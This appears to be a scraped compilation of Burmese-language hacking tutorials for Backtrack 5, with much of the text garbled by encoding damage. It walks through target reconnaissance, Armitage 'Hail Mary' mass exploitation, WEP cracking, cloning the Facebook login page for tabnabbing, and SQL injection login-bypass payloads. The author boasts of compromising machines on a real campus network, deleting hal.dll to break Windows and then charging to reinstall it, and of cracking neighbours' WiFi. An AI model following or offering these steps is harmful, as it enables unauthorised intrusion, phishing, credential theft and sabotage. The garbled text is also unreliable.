Upload
minwai-mon
View
1.767
Download
0
Embed Size (px)
Citation preview
Backtrack 5 > Theharvester Information Gathering Tutorial Posted on August 26, 2012 by Dominator
Information Gathering ထ Step ) - ထ ထ
./theHarvester.py -d google.com -l 500 -b google ./theHarvester.py -d targetsite.com -l 500 -b google Personal Inf - ထ
Kyaw Swa Htoon ထ ထ ထ –
ယခ ႏစကနပငးေလးမာ ကေနာရ႕ခစလစြာေသာ လကတြေဖာ ညအစကေတြက
ကေနာရ႕နညးပညာေလလာေတြ႕ရခကအခ႕က သငၾကားျပသသြားမာပါ..ကေနာတ႕အဖြ႕ေတြက
Gray Hack ေတြျဖစတာန႕အည ကေနာတ႕ရ႕စတေတြဟာလ မးခးလဘ အျမေျပာငးလေနတာပါ..
ကေနာတ႕တတကၽြမးတနညးပညာေတြန႕ကယန႕နးစပရာ ကြနပတာအသးအျပသမားက ကသလ
လရ ၀မးလ၀ ဆတစတထားန႕ကညခၾကပါတယ.ဒလကညႏငဖ႕ဆတာကလ..တစလႏစလအတြငး
သငယတတေျမာကလာတ ပညာရပေတြန႕ကညတာမဟတပါဘး..ႏစရညလမား ကယဘာသာ
အငတာနကမာေရာ.အျပငေလာကမာပါ ဆရာမရဘ ေလလာသငၾကားခရတသေတြပါ..ျမနမာႏငင
ဟာ နညးပညာေခတကဥးတညေနၿပ..တးတကလာေနၿပ..အတကအခကေတြမားလာေနၿပ.ေနာက
ပငး ႏငငကျမငမားတ နညးပညာေတြလႊမးမးလာေတာမယဆတာ သာမနလတနးစားေတြ ဘယသမ
သပမသၾကဘး..ဒါေၾကာင အခကတညးက တကခကဖ႕ကာကြယဖ႕ကေနာတ႕ေတြျပငဆငေနၾက
တယ..ဥပမာ ေျပာရရင လာမယႏစႏစအတြငးမာ ကြနပတာတစခလးအတြငးမာရတ Data ေတြက
အေ၀းထနးစနစန႕ဖကဆးပစႏငေလာကတအထ နညးပညာေတြျမငမားလာေတာမယ.အခကတညး
ကအရပ အေယာငေတြ ျပေနၿပ.စမးသပခကအခ႕ေအာငျမငေနၿပ..ဒါေတြက သေနလ႕
ကြနပတာအသးျပသတငးက တတကၽြမးနားလညသမားက ကာကြယဖ႕နညးလမးေတြေျပာျပေန
တယ.. ဒလ ေျပာျပေနတာေတြက ေစတနာကနားမလည..အသအမတမျပ
“ေပါေတာေတာ..ရးေၾကာငေၾကာင”အလပေတြလ႕”.ကေနာန႕သကဆငသတစဥး..ဒါမမဟတအျခား
တစေယာကကကေနာကေစာကားခတယ..။ ကေနာလ
Generated by Foxit PDF Creator © Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.
အရာရာသးခလာသမ..ဒတစခကတညးနတင ေစတနာဆတာ လတငးန႕မတနပါဟ
နားလညခတယ..ေအာ..ကယပါးစပပတမေနႏငလ႕အေျပာခခရတာဘေလ။
ဒေနရာမာ တစျခားတစစမးတစေယာကသာဆရင ကေနာလကစားေခမမာဘ ကြနပတာတစလးရ႕
တနဖးက အနညးဆး ေလး ငါး ေျခာကသနးေလ..အလတနဖးကခဏခငး အေ၀းကေနဖကဆးပစ
လ႕ရတယ..ပကသြားခရငလ ဘယလတရားစြခငသလ.သကေသရသလား မရဘးေလ.ဒါေၾကာင
ကယဘကက အျမတကနတာေပါ..ထားပါေတာ ဒါကေနာေျပာျပတာပါ..တကယလ႕ ကေနာအဖြ႕
ထက ညအစကေတြကလ ေစတနာေစာကားခသညရေသာ.ဘယလနညးန႕လကတ႕ျပနႏငတယ
ဆတာ ကေနာ သငၾကားျပသေပးသြားမယ.အငဂငနယာဘာသာရပပျဖစျဖစ..သတေဗဒ
ဘာသာရပပျဖစျဖစ.. ပညာရပက ပညာရပဘျဖစတယ.ကေနာတ႕အေနန႕ဘယသ႕ဘယသ႕ကမလ
ပညာရပန႕ပတသကၿပးမေစာကားခဖးဘး..ကေနာတ႕ရ႕ Hacker ပညာရပန႕ပတသကၿပးေတာလ
ေစာကားတာမခႏငဘး.ပညာရပသငၾကားတယဆတာ ၀မးစာရာဖ႕လ႕ေလာကအကး အသးခဖ႕ဘ
ေလ.. သတစပါးရ႕ ပညာက ရကပတေစာကားဖ႕ စတဓာတလး၀မရရးအမနပါ.ဒလစတဓာတမးရတ
သေတြကလ ကေနာတ႕အေနန႕အျပငးအထန ရႈတခပါတယ..ကေနာတ႕ရ႕ ပညာရပန႕ပတသကၿပး
မယရငစမးသပၾကညႏငပါတယ..မလပခငလ႕မလပတာဘရတယ..လပၿပေဟဆလင ၾကပငခတ
ၾကငတပါမကနရငးတတတာ Zer0 0r Her0 ရ႕အကငပါ..။ ျမနမာႏငငမာ အတတပညာသာရၿပး
အသပညာေတြနမပါးေနပါၿပ…ဘြ႕ရပညာတတဆတငးလ ေသာကထငမၾကးပါ..ဘာလ႕လဆေတာ
အသပညာနမပါးေနလ႕ပါဘ..ေစာကားတာလမဟတသလ.ဘယသ႕ကမလညးမရညရြယပါ..အမား
စက ဥးတညေျပာေနျခငးျဖစပါတယ.အထမယ ကယမားပါေနရငေတာ ျပငလကေပါေလ..အဟတ။
ဒါေၾကာင ဘယသ႕ကမလညး ပညာရပန႕ပတသကၿပးအထငမေသးပါန႕..မေစာကားပါန႕.ကယက
ကယလညး အထငမၾကးပါန႕..အားလးကသနရာသနရာ ပညာရပတစခမေလာကလမးေနရတာပါ
ဥးတညခကက ဘ၀အာမခခကရဖ႕န႕စား၀တေနေရးအတြက ဆတာ အတတခညးပါဘ။ ဒါေၾကာင
Zer0 0r Her0 အဖြ႕သညလညး က႕လမးကယေလာကေနျခငးပါ..ဘယသ႕မ ေသာကဂရမစကပါ။
Generated by Foxit PDF Creator © Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.
အျမတမးနညးပညာန႕ပတသကရင တတကၽြမးတပညာရငေတြန႕တငပငၿပးကညေပးေနတတသလ
မမတ႕ပညာရပကတနဖးထားသညအတြက ေစာကားပတခတလာလငလ တကခကဖကဆးဖ႕၀နမ
ေလးတတပါ..။ အခ Buffer Over Flow န႕ဆကႏြယတNetwork Hacking
ကသငၾကားျပသေပးမာျဖစပါတယ..
အေျခခရသေရာ၊ မရသပါ လကေတြ႕လပေဆာငႏငေအာင ေရးသားထားပါတယ။
ဆတာ ဟ႕အရငကတညးက ခထ application , os န႔ တျခားsoftware
ေပါကေနသည vulnerability က exploit လပႏငတနညးပါ။ အခက Network Hacking န႕ေရာၿပးတငျပ
သြားမာျဖစပါတယ..အရငဆး BackTrack 5 ကအသးျပၿပး သကဆငရာ Target ရ႕
Ip Addressခတဆကၿပး ၄ငးရ႕ ကြနပတာအတြငးသ႕၀ငေရာကမာပါ..၄ငးရ႕ ကြနပတာအတြငး
ေရာကပဆမေတာ Computer အတြငးမယရတ Data ေတြကဖကမလား..ScreenShoot ရကမလား။
အငတာနကဆငမာသးေနရငး တစဆငလးမာရတ ကြနပတာေတြကထနးခပခငသလား.၊
Wireless ကြနယကမာ Server အပါအ၀င Wireless သးေနတကြနပတာ Laptop ေတြကထနးခပခင
သလား.ဒနညးက သပကအသး၀ငပါလမမယ.ကေနာလကေတြ႕အေနျဖင ေနျပညေတာတကသလတစခမာ
ရတ Wireless ကြနယကက စမးသပၾကညရာမာ Network န႕ခတဆကထားတကြနပတာ Desktop
ၾကးေတြ သာမက.. Wireless သးေနတကြနပတာ Laptop ေတြကပါထနးခပလ႕ရခပါတယ.ဒါေပမယ
ကေနာ ဘားမမလပခပါဘး.လပမယလပခငရငလ အားလးက Format ခညးရကေပးလကခငပါတယ.ဒါေပ
မယ ကေနာခစသကြနပတာ i5 Laptop ေလးထသြားမာစးတအတြက မလပခပါဘးေလ…အဟတ။
က.လပေဆာငပအဆငဆငကဆကေျပာပါမယ…။
BackTrack Terminal ကအရငဖြငပါ။
အရငဆး cd /pentest/exploits/framework ကရကပါ။ပမာျပထားပါတယ.ၿပးေတာ ls ကရကၾကညလက
Armitage ကေတြ႕ပါမယ။ Armitag ကေခၚမယ။ ./armitage ၿပးေခၚလကပါၿပ.ပမာၾကညပါ။
Generated by Foxit PDF Creator © Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.
ေအာကပါ ပအတငး Box တကလာရင Start MSF ကႏပပါ။ Default user
အတငးဘထားပါ.ဘားမမေျပာငးပါန႕။(BackTrack5 R3 မာဆရင ေတာ Connect န႕ Help
ဘေပၚမာပါ။ Connect ကႏပလကပါ Yes or No ေမးရင Yes ေပးလကပါ။ Progress Bar
တကလာပါလမမယ ေစာငၾကညေနလကပါ။ျပညသြားၿပဆတာန႕ေအာကပပါအတငး……….
Armitage Promgram ေပၚလာၿပ..ပပါအတငးျပလပပါမယ။ အေပၚက Tool Bar
ထက Host > Namp Scan > Quick scan(Os detect) ကေရြးပါမယ။ (BackTrack R3
မာဆရငေတာ MSF Scans ကေရြးေပးရပါမယ။)
Generated by Foxit PDF Creator © Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.
R3 မာ MSF Scans ကေရြးေပးလကတာန႕ IP ထညစရာ Box ေလးတကလာပါလမမယ။
ဥပမာအားျဖင Network တစခတြငးမာ ကြနပတာ 15 လးရတယဆပါစ႕.. အဒကြနပတာအငပေတြ
က 192.168.1.1 ကေန 192.168.1.15 အထသတမတထားပါတယ။ ဒေတာ အငပထညစရာ Box
ထမာ 192.168.1.1-192.168.1.20 လ႕ရကထညေပးၿပး OK ေပးလကပါ။ Open ျဖစေနတ TCP
ေတြက စရာေနပါၿပ..Complete ျဖစတအထ ေစာငေပးပါ။ Scan Complete ျဖစၿပဆတာန႕
Network အတြငးမာရတ ကြနပတာေတြ ကျမငရေတာမာပါ။
Generated by Foxit PDF Creator © Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.
Tool Bar က Attack > Hail Mary ကေရြးပါ..အဒအခါမ Exploit ေတြက Scan
ဖတေနတာေတြ႕မာပါ။ Scan ဖတၿပး တာန႕ ခဏေစာငၾကညေနပါ.. Prot Attack
ခရတကြနပတာဟာ မးၾကးပအနေရာငန႕ျပေနမာပါ။ အဒကြနပတာက Right Click ေထာကၿပး
စတၾကက ေမႊႏငပါၿပ..။
Generated by Foxit PDF Creator © Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.
Screen Shoot ရကမလား၊System 32 ထက၀ငေမႊမလား..Data ေတြက Download ခမလား၊
Upload တငမလား၊ Target ကြနပတာထမယ Shell တငမလား..Virus
လႊတမလား..ကေနာကေတာ ဘာလပသလဆရင System 32 ထက ၀ငၿပး hal.dll ကဖကပစလက
တယဗာ..အအခါကရင ၀ငးဒးတကမလာေတာဘးေလ..မၾကာပါဘး ေနာကထပ တစနာရေလာက
ဆရင ကေနာက ဌာနဆငရာေတြကဖနးဆကၿပးေခၚပါတယ… “ကြနပတာ Windows ကသြားလ႕
လာတငေပးပါဥး” တေလ..က..၀ငးဒးတစခါတင 7 ေထာငဗာ…အေ၀းကေနထငဖကတယ…..
ဖနးဆကေခၚရင သြားျပငေပးလကတယ..လာထား 7 ေထာင..ကယစားေပါကန႕ကယကေတာ
အဆငကေျပလ႕ေပါ…ဟဟ…..။
www.minsoeyarsar.com
Blogger Zer0 0r H3r0
Generated by Foxit PDF Creator © Foxit Softwarehttp://www.foxitsoftware.com For evaluation only.
Dual Boot install Backtrack 5 Posted by Aung Kyaw Moe
Backtrack 5 က ကြနေတာ Window 7 နတြတငနညးေလးေရးေပးပါမယမခကပါဘး လြယပါတယေတာေတာကလြယပါတယ အရငဆး Backtrack 5 က Live အေနန Boot တကလကပါ ေနာက startx ကနပျပး ငလကပါ ျပးရင Backtrack 5 ေပါလာပါလမမယေနာက Desktop ေပါမာရတ Install Backtrack ဆတ icon ကနပျပး Install လပဖျပငဆင ပါ ………..ပမာျပထားပါတယ ……….:P
ပမာျပထားတအတငးပ next ကနပလကပါ…….ေနာကတစပကၾကညပါ……….
ပမာျပထားတအတငးပ Region န႕ Time Zone ကေျပာငးေပးလကပါေနာက Next ကႏပပါ………
Forward ကႏပပါ…………
ကြနေတာတ က Partitions ကအသစနခြတငပါမယ အဒါေျကာင Specify partitions manually (advanced) ကေရြးလကပါ ေအာကမာျပထားတအတငး Box ေလးကလာပါလမမယ
ကယထားခငတ Amount ေလာကထားလကပါ အေရးျကးတာက mount point ေနရာမာ / ေလးကေရြးေပးဖမေမပါနေနာ….ေနာက OK ကနပပါ တစခါ
ကြနေတာေလာေလာနကနခတာရပါတယ swap file ကလ 1 Gb ေလာကထားေပးလကပါ Specify partitions manually (advanced) ကေရြးလကပါ အေပါကနတတပါပ mount point ေနရာမာ
swap ကေရြးေပးပါ အဒါဆရပါျပေနာက OK ကနပပါ…….
Install ကနပပါ…………….
သြငးျပးတအထေစာငပါ အားလးျပးသြားရငေအာကကအတငးပ ေပါလာပါလမမယ အခါကရင Restart လပလကပါ ျပနတကလာရင Dual Boot နတကလာပါလမမယ
Default username and password က root/ toor ျဖစပါတယ ေနာက Graphic interface က run ဖအတြက Startx လ command ေပးရပါမယ…… အေလာကဆအဆငေျပ မယလေမာလငပါတယ ကြနေတာတသညလညးအရမးကေတာေနတတေနတသမားမဟတျကပါ သာမနေလလာသအဆငေလာကသာရပါေသးတယ ဒါေပမယကြနေတာတ သသမ တတသမေလးေတြက သငယခငးမားအားလးအလြယတကေလလာနငေအာင ေရးတငေပးထားျခငးသာျဖစပါတယ အားလးပအဆငေျပတာမေျပတာေလးေတြက comment ေလးေတြထားေပးခေစခငပါတယ……ဒပစျဖင သငဆရာ ၊ ျမငဆရာ ၊ ျကားဆရာမားအားလးက ဂါရျပလကပါတယ…………:P
Cracking WEP Key With Fern-Wifi Cracker In Backtrack 5 R3 Posted by Aung Kyaw Moe
ကၽြနေတာတ႕ သငယခငးမားေဘာတာမားက Backtrack က Wifi Hack အေနန႕ပ သၾကတာမားပါတယ Wifi Hack ေၾကာငပ Backtrack ကသၾကပါတယ ကၽြနေတာေလလာထားသေလာကေပါေနာ အေတာကၽြနေတာလညးစဥးစားတယ wifi hack အေၾကာငးေလးေရးမယေပါေနာ ဒါေပမယအခဟာကကၽြနေတာရ႕ ပစက တစကယ အစစ လႊငထားတလငးေတြေပၚမာစမးထားတာဆေတာ သတ႕က ( wifi ) လႊငတဆငေတြကအားနာတာကတစေၾကာငးဆငးတငးကအစကေတြန႕သေနတာကတစေၾကာငး သတ႕ wifi password က ဆဒေပၚမာဟတျပးမျပခငတာကနားလညေပးပါလ႕ပထမဆးေမတာရပခခငပါတယ အခေျပာျပမယ fern-wifi cracker ကဘယေလာကေတာငလြယလဆရငသက ေလးတနးကေလးကေတာငကြနျပတာကငျပးဟတလ႕ရပါတယ အရငလ command ေတြန႕မရႈပေတာပါဘး လြယပါတယ ကစရေအာင အရငဆး Fern-wifi cracker ရတေနရာကသြားလကပါ ေအာကမာျပထားပါတယ
ျပးရငဖြငလကပါ ေအာကမာက fern-wifi cracker က GUI အေနန႕ေတြ႕ရတပ
အေပၚကပမာ Select Interfaces ေနရာမာ wlan0 ကေရြးလကပါ ေနာက ေအာကက Scan For
Access points ကႏပလကပါ ေအာကကမနေနတဟာေလးေတြလငးလာပါလမမယ button ကေျပာတာေနာ………….:P
ႏပလကပါ ေအာကကပမာၾကညပါ ႏပျပးသြားတအေျခအေနေပါ သက လငးေတြကရာျပးရင ဘယႏစလငးရလေဘးမာေဖာျပပါလမမယ ေအာကကပမာၾကညပါ
အခကၽြနေတာတ႕ က WEP က ဟတမာပါ အေတာ WEP ကငါးလငးရပါတယ Wifi WEP ကႏပလကပါ ေအာကကပမာၾကညပါ ရေနတလငးေတြကျပပါလမမယ
ကအေနာကေတာကယလငးကျပနဟတတယဂာ ဟးဟး :p ကေရြးလကပါတယ အစကတ႕ေတာအစကတ႕ေပၚတဟာေရြးေပါေနာ သားန႕ေတာတမာမဟတဘးေလေနာ ေနာကမ Group ထမာဟနငန႕လညးတဘးဆျပးလာေျပာန႕……..:P ေနာက WIFI Attack ဆတအေပၚဆးက Button ကနပလကပါ…….ေအာကကပမာၾကညပါ……….:D
ကအခဆရငအားလးအလပလပေနပါျပ………..:P ေအာကကအနတနးေလးျပညသြားရင ေအာကဆးမာ Password ထြကလာပါလမမယအေနာ Password ထြကတ screenshot ကေတာမထညေတာပါဘး….:D မရလ႕မဟတပါဘး ရမရကေတာအစကတ႕ဟတၾကညရငသမာပါ အေနာမကႏာနာလ႕ထညေတာဘး…အဆငေျပပါေစ… Wifi လငးမားက ဟတ ျပးပကပကမကနပသးႏငပါေစလ႕ဆေတာငးေပးလကပါတယ အေနာကေတာေပးျပးသးတာ ဟးဟး ………..:P
ဆကလကၾကးစားပါအးမယ
ေကးဇးတငပါတယ………..;)
Hack Facebook Account in Back Track Posted on August 26, 2012 by Dominator
..
- .
၂ .. 2.Website Attack Vectors
၃ .. 4.Tabnabbing Attack Method
Enter the URL yo Clone: W - —
http://www.facebook.com/login.php …
Install Nvidia Driver in Backtrack 5 R3 (Easy Way) Posted by Aung Kyaw Moe
ကၽျနးေတားတ႕ ကျနးပတာမြာ Graphic Driver ကလညးအေရၾကတာကေနား အေတာ ကၽျနးေတားတ႕ Linux မြာလညး Graphic Driver သျငးလ႕ရပါတယးအဒါသျငးပမြ Compiz ကအလပးလပးပါတယး (Backtrack မြာေပါေနား………:D) အခကၽျနးေတားေပာပမယးနညးက လျယးပါတယးေနာကး တခာနညးေတျထကး ၅ဆ ေလာကးပမနးပါတယး ပေတာဒပစးမြာ ပမတငးပါဘ ဘာလ႕လဆေတာတငးစရာကမလေအာငးလျယးေနလ႕႔ပါ……………….:P
အရငးဆ ကၽျနးေတားတ႕ Backtrack က restart ခပါမယးေနာကးအရငးအတငးပBoot တကးပါမယးပရငး Login ငးပါမယးေနာကးအမြာအေရၾကတာက Startx ကမရကးခငးလပးရမြာပါ ကစရေအာငးသျငးနညးေလ………….:P
အရငးဆကၽျနးေတားတ႕ Graphic Driver ကေဒါငးလဒးလပးရပါမယး ဘယးမြာလပးရမလဗာ ေအားသ႕ရ႕ဆဒးမြာသျာလပးေပါေနား ေအာကးကလငးကသျာလကးပါ အမြာကယးရ႕ Graphic Driver ကေရျ ပ ေဒါငးလဒးလပးပါ ..
Driver Download: http://www.nvidia.com/Download/index.aspx?lang=en-us
ပရငးသကNvidia-linux.run ဆပ run ဖငးေလကလာပါလမးမယး ပရငးေဒါငးထာတ .run ဖငးေလက root ေအာကးမြာသျာထာလကးပါ အဒါမြရြာရတာလျယးမြာ တစးခါတညး Install လပးယပ………..:D ကအခ ေအာကးကအပာေရာငးစာသာေလႏြစးခက Terminal ထမြာ တစးခခငးစရကးထလကးပါဘာဖစးဖစးေပါေနား ဒတယအေၾကာငးကေတာနန Error ပ ပါလမးမယး ဒါေပမယး ကစၥမရြပါဘ …………..:P
1. echo options nouveau modeset=0 | sudo tee -a /etc/modprobe.d/nouveau-kms.conf 2. update-initramfs -u
ဒေနရာမြာ အလျနး႕အလျနးအေရၾကတာကေတာ အႏြစးေၾကာငးလထညးပတာန႕ X Server က Kill ရမြာပါ reboot လပးပါ မလပးခငးရငး Ctrl+Alt+F1 ကတျႏြပးပါ GUI Backtrack ေခၚ X Server
ၾကကသျာပါလမးမယးအခါမြ အမေရာငးန႕ command ရကးဖ႕ root@bt ~ ဆပေပၚလာပါလမးမယး startx ရကးပမငးခငးမငးရတပေပါေနား အမြာ
3. init 3
ကရကးထညးပါ အေရၾကတာက startx ကမရကးခငးအ command ေပရမြာေနား…………..:D
4. sh <filename>.run ————->
အလညးကFile name က ေဘာတာတ႕ေဒါငးလဒးလပးထာတ graphic driver name ပါမမြာေအာငးရကးပါေနား…………:P
အဒါဆရပါပ ကနးတာကေတာလပးတတးမယးထငးပါတယးမေရေတာပါဘအေနားကရြငးသျာစရာေလရြလ႕႔ပါ Screen Shot မတငးေပႏငးတာချငးလျတးပါ ဒနညးက တစးခာပမြနးသျငး နညးေတျထကး ၅ဆ ပမနးပအလပးဖစးပါတယးကၽျနးေတား ကယးတငးလညးဒလပသျငးထာ တာပါ
ဆကးလကးၾကစာပါအမယး ေကဇတငးပါတယး………….:P
Killing Antivirus In Backtrack 5 Posted by Aung Kyaw Moe
Backtrack မာ အသးငတ Forensics Tool ေတြထက
1. chkrootkit န႕ 2. rkhunter
ဆတ rootkit ေတြ Trojan ေတြက kill လပမယ Tool ၂ခန႕မတဆကေပးပါမယ.။
chkrootkit ကေတာ scan ဖတတေနရာမာ အခနနနပယျပးေတာ rkhunter ကေတာမနစအနညးငယအခနယပါတယ တစမးတညးန႕ပ scan ဖတမယဆရငေတာ အာမေတာသပမခႏငပါဘး rootkit ေတြ ကရငးႏငဖ႕ဆရင ႏစမးလးန႕ဖတမာ အဆငေျပႏငပါလမမယ……….ကစမးၾကညရေအာင…
Application>Backtrack>Forensics>Anti-virus Forensics Tools>
ဆျပးသြားလကပါ Chkrootkit န႕ rkhunter ကေတြ႕ပါလမမယအရငဆး Chkrootkit ကဖြငလကပါ… ပမာျပထားပါတယ……:D
သ႕ရ႕ အသးျပပန႕ Option ေတြပါ Command ကေတာ ./chkrootkit ပါ ပမာျပထားပါတယ
ဒါကေတာ scan ဖတေနတပပါ ေအာကမာၾကညပါ…..:)
သ႕ဟာသစစသြားပါလမမယေတြ႕ရငလညးဖကလကပါလမမယ ..ဒါက scan ဖတလ႕ျပးသြားတပပါ
အခေနာကတစချဖစတ rkhunter ကဖြငပါ
ေနာက rkhunter က update လပေစခငပါတယေနာကမာ check လပပါမယ အရငဆး rkhunter — update လ႕ရကလကပါျပးသြားရင rkhunter –check ဆျပးစစလကပါ သကနနေတာၾကာပါတယ……….:P ေအာကကစစေနတပပါ……….:D စစေနတအခနမာ enter သးခါႏပခငးပါလမမယ ကၽြနေတာလငးကတကလကကလကျဖစေနလ႕ပေတြထပမ တငေတာတာပါ ……..:D
အခဟာကျပးသြားတပပါ ……..ေအာကမာၾကညပါ………
ျပးသြားရင log file ေတြကၾကညလ႕ရပါတယ var/log/rkhunter.log ဆတေနရာမာသြားၾကညႏငပါတယ Terminal ထမာ gedit var/log/rkhunter.log ဆျပး command ေပးျပး ၾကညႏငပါတယ ေအာကမာျပထားပါတယ…………
အခနကသပမရတာကတစေၾကာငး စာေမးပြကနးေနတာကတစေၾကာငး ေလာကလညခငေနတာကတစေၾကာငးတစေၾကာငး ေပါငးမားစြာျဖစ ေနေသာေၾကာင ပစေတြနနက ေနတာပါ ေနာကစာေမးပြျပးရငဒထကပအားစကျပးေရးပါမယအခေတာ
စာလညးလပေနရတာေၾကာငအရငလသပမရငးျပႏငတာန႕ လ အပခကမားရရင ခြငလြတေပးပါလ႕ေတာငးပါခငပါတယ
ဆကလကၾကးစားပါအးမယ………….;P
SQL Injection Attack Myanmar Version for Begineers
3thic0kiddi3
SQL Injection Attack For Beginners By 3thic0kiddi3
-- SQL INJECTION ဆသညးမြာ (ေရသ- က BrB)
SQL injection ဆတာကေတာ ယေန႔ေခတး အငးတာနကးစာမကးႏြာေပၚမြာ အၿဖစးအမာဆ web application
အမြာၿဖစးပါတယး။ ၄ငး web application အမြာတစးခမြေန၍ တရာမငး ငးေရာကးအသၿပသေတျ
(Hackers) က မမတ႔ရ႕ အေရၾကတ႔ အခကးအလကးေတျက ခယသျာႏငးပါတယး။ ဒါေၾကာငး SQL injection
ဆတာ web or db server တ႔ရ႕ အမြာေၾကာငးမဟတးပ အေတျ႔အၾကမ၊ အေရအခငး ညဖငးတ႔
programming ေရဆျသေတျေၾကာငးသာၿဖစးပါတယး။ ဒနညးလမးက အေတစးေနရာကေန application,
web server က အလျယး ကဆထနးခပးႏငးပါတယး။ ဒ SQL injection မြာ ပစအမမေသာ SQL
commands ေတျ န႔ web page ကေန အမမေသာ data ေတျက ထတးယႏငးပါတယး။
ဥပမာတစးခအေနန႔ေၿပာမယးဆရငး ကၽျနးေတားတ႔က Company တစးခရ႕ Network
တစးခက ငးေရာကးေတာမယးဆရငး port scanner ေတျန႔ sanner ဖတးၿပ အမြာေတျန႕ ပျငးဟေနတ႔ port
ကေန ငးေရာကးသျာႏငးပါတယး။ ဒါေပမ႔လညး အငးတာနကးန႔ ခတးဆကးထာတ႔ Web Server (Host Sever)
တစးခက port 80 ေလာကးပဖျငးမယး၊ တစးၿခာ security ပငးေတျ ေပထာမယးဆရငး port scanner
ဘယးေလာကးေကာငးေကာငး အလပးၿဖစးမြာမဟတးပါဘ၊ ငးေရာကးဖ႔ခကးသျာပါလမးမယး( ခကးခေနမယး )...
ဒါဆရငး Web Hacking က ဦတညးၿပေၿပာငးၾကညးရပါလမးမယး... Web Hacking လ႔ေၿပာရငး
ေတားေတားမာမာကေတာ SQL Injection ကပထမဦစျာေၿပၿမငးၾကမြာပါပ... ဟတးတယးေလ.. SQL
Injection ကတစးၿခာဘာမြမလဘ Web Browser တစးခပလတယး...
SQL Injection အေႀကာငးရြငးပခကးမာ-
SQL injection နပါတးသတးလ Web development knowledge ရြရငးေတာပေကာငးပါတယး။PHP န
MysqL အေႀကာငး Knowledge နနရြထာရငးေတာ ပ ပနာလညးပါလမးမယး။
---DATABASE ဆတာဘာလ?---
ရရရြငးရြငးပါပ... Database ဆတာဘာလဆရငး Database ဆတာ အခကးအလကး Data
ေတျစစညးသမးဆညးထာတ႔ Application တစးခပါပ... Application Programming Interface (API)
ေတျက တညးေဆာကး အသၿပမယး ထနးသမး သမးဆညးထာမယး။ Database(DB) servers ေတျဟာ Web
development လပးငနးေတျ န႔လညး ေပါငးစညးအသၿပလ႔ရတ႔အတျကး ၄ငးအထက data ေတျက
ထတးယအသၿပ၊ ၾကညးရႈ႕ဖ႔ဆတာ ခကးခ႔တ႔ကစၥတစးခေတာမဟတးပါဘ။ Database အထမြာ usernames,
passwords စသညး ေတျလ အေရၾကတ႔ အခကးအလကးေတျကလညး သမးဆညးႏငးတာ ၿဖစးတ႔အတျကး
Database ရ႕ လၿခေရဟာလညး အလျနးကအေရၾကပါတယး။ ထနးသမးမႈ ညဖငးတ႔ database
တစးနညးအာၿဖငး အမြတးတမ႔ၿဖစးေစ၊ သတမမႈ၍ေသားလညးေကာငး၊ အေၾကာငးေၾကာငးအမမေၾကာငး
programmer ေတျေရသာထာတ႔ code ေတျရ႕ လျမြာမႈေတျ ေၾကာငး ဒလဟာကျကးေတျ ၿဖစးေပၚကာ
database ထက အၿခာ တရာမငး ငးေရာကးသတ႔အာ လမးဖျငးေပသလၿဖစးသျာတတးပါတယး။ DB
servers ေတျအမာၾကရြတ႔အထမြာ ဒါေလေတျက အသမာတာေလေတျပါ။
MySQL(Open
source),
MSSQL,
MS-ACCESS,
Oracle,
Postgre SQL(open
source),
SQLite စသညးေပါ႔...
Database ရ႕ တညးေဆာကးပေလက ၿမငးႏငးေအာငးလ႔ ဇယာေလန႔ၿပထာတာပါ။
---ေရြာငးကျငး ငးေရာကးၿခငး---
Site ေတျမြာ username, password ေတျန႔ login ငးခငးတယးဆတာ site အထမြာ ရြတ႔ content ေတျက
မြတးပတငးထာတ႔သ (username & password ရြထာတ႔သ) ေတျကသာ ၾကညးရႈအသၿပချငးေပထာတာပါ။
အကယး၍ မတးေဆျက username & password မရြပ ရြသက႔သ႔ ငးေရာကးအသၿပမယး (user registration
မလပးပ ငးေရာကးတယး) ဆရငး ဒါက BYPASSING LOGINS လပးတယးလ႔ေခၚပါတယး။
ဒါကေတာprogrammer ရ႕ login မြာစစစးမႈ မေသခာလ႔ ၿဖစးတ႔အတျကး ကေကာငးေထာကးမစျာန႔ User
name န႔ Password ကမသပ login ငးလ႔ရသျာပါလမးမယး။
ဥပမာတစးခအေနန႔ ၾကညးမယးဆရငး username က admin ၿဖစးၿပ password က 12345 ဆၾကပါစ႔...
ဒါဆရငး SQL query က SELECT USER from database WHERE username='admin' AND
password='12345' ဆၿပၿဖစးသျာပါလမးမယး..... အကယး၍ အေပၚ SELECT command တနးဖက
မြနးတယးဆရငး site ထက ငးချငးၿပမြာၿဖစးပါတယး။ အကယး၍ အထကးပါေၿပာခ႔သလ programmer က login
မြာမြနးကနးတ႔စစစးမႈမရြရငး Hacker ေတျက ေအာကးပါအတငး ငးေရာကးသျာႏငးပါတယး။
username:a or 1=1--
password:blank
SQL
query မြာေတာ
SELECT USER from database WHERE username='a' or
1=1-- AND password=''
ဒါက comment operator ပါ အ႔လပ အၿခာ
comment operator က /* ၿဖစးပါတယး။
SELECT USER from database WHERE
username='a' or 1=1
1=1 က အၿမတနး query က true ၿဖစးေစၿပ OR ကေတာ query တစးခက true ၿဖစးတ႔အတျကး
အၿခာတစးခကလညး true ၿဖစးသျာေစပါတယးဒါေၾကာငး 'a' ဆတ႔ user ဟာ DB မြာမရြေတာငးမြ ဒ query က
true ၿဖစးကာ site admin က ငးေရာကးချငးေပသျာပါလမးမယး... ဒလနညးန႔ Vulnerable ၿဖစးတ႔ site
ေတျအတျကး ေအာကးပါအတငး စမးစစးႏငးပါေသတယး...
username:' or 1='1 password:' or 1='1
username:'
or '1'='1' password:' or '1'='1'
username:or 1=1 password:or 1=1
--- လ႕ ြကးထာေသာ Data မာက ငးေရာကးအသၿပၿခငး---
SQL injection က အခလ bypassing logins တစးခတညးမဟတးပ DB servers ကေန
လ႕ ြကးစျာသမးဆညးထာတ႔ Data ေတျက ရယႏငးပါတယး... အနညးငယးရႈပးေထျ ေနမြာၿဖစးတ႔အတျကး
နနေလ အထဂရၿပၿပေတာ ေလလာၾကညးပါ။ ေအာကးပငးမြာ လကးေတျ႔စမးလ႔ရေအား site link န႔ တကျ
ေဖားၿပေပထာပါတယး။
---အာနညးခကး
အမြာမာ ရြာေဖျစစးေဆၿခငး---
Site တစးခကရြာလကးမယး...
In PHP ==>>
www.site.com/article.php?id=5
id
variable assign လပးထာတ႔ ေနာကးနာက ' (apostrophe) ေလတစးခက
ထညးလကးပါမယး..
www.site.com/article.php?id=5'
